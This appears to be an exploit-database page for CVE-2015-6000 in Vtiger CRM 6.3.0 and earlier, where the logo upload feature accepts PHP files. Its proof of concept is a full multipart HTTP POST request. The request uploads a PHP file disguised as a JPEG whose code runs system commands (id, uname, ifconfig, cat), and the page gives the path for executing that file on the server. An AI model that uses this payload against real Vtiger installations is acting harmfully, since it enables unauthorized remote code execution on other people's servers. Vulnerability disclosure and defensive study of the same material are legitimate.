Lucene search

K
zdtBenjamin Daniel Mussler1337DAY-ID-24304
HistorySep 28, 2015 - 12:00 a.m.

Vtiger CRM 6.3.0 Authenticated Remote Code Execution

2015-09-2800:00:00
Benjamin Daniel Mussler
0day.today
66

0.025 Low

EPSS

Percentile

89.0%

Exploit for php platform in category web applications

# Exploit Title: Vtiger CRM <= 6.3.0 Authenticated Remote Code Execution
# Date: 2015-09-28
# Exploit Author: Benjamin Daniel Mussler
# Vendor Homepage: https://www.vtiger.com
# Software Link: https://www.vtiger.com/open-source-downloads/
# Version: 6.3.0 (and lower)
# Tested on: Linux (Ubuntu)
# CVE : CVE-2015-6000
# Source: http://b.fl7.de/2015/09/vtiger-crm-authenticated-rce-cve-2015-6000.html
 
 
=== Description ===
 
Vtiger CRM's administration interface allows for the upload of a company
logo. Instead of uploading an image, an attacker may choose to upload a
file containing PHP code and run this code by accessing the resulting
PHP file.
 
Detailed description:
http://b.fl7.de/2015/09/vtiger-crm-authenticated-rce-cve-2015-6000.html
 
 
=== PoC ===
 
Through a specially crafted HTTP-POST request, a PHP file is stored on
the server hosting the Vtiger CRM software:
 
    POST /index.php HTTP/1.1
    Host: [...]
    Cookie: [...]
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=---------------------------51732462825208
    Content-Length: 2040
 
    -----------------------------51732462825208
    Content-Disposition: form-data; name="__vtrftk"
 
    [...]
    -----------------------------51732462825208
    Content-Disposition: form-data; name="logo"; filename="2.php"
    Content-Type: image/jpeg
 
    <? system('id; uname -a; /sbin/ifconfig -a'); system('cat ../../vtigerversion.php'); ?>
    -----------------------------51732462825208
    Content-Disposition: form-data; name="address"
    [...]
 
 
The resulting PHP file can then be accessed at
 
        [Vtiger URL]/test/logo/2.php

#  0day.today [2018-02-17]  #

0.025 Low

EPSS

Percentile

89.0%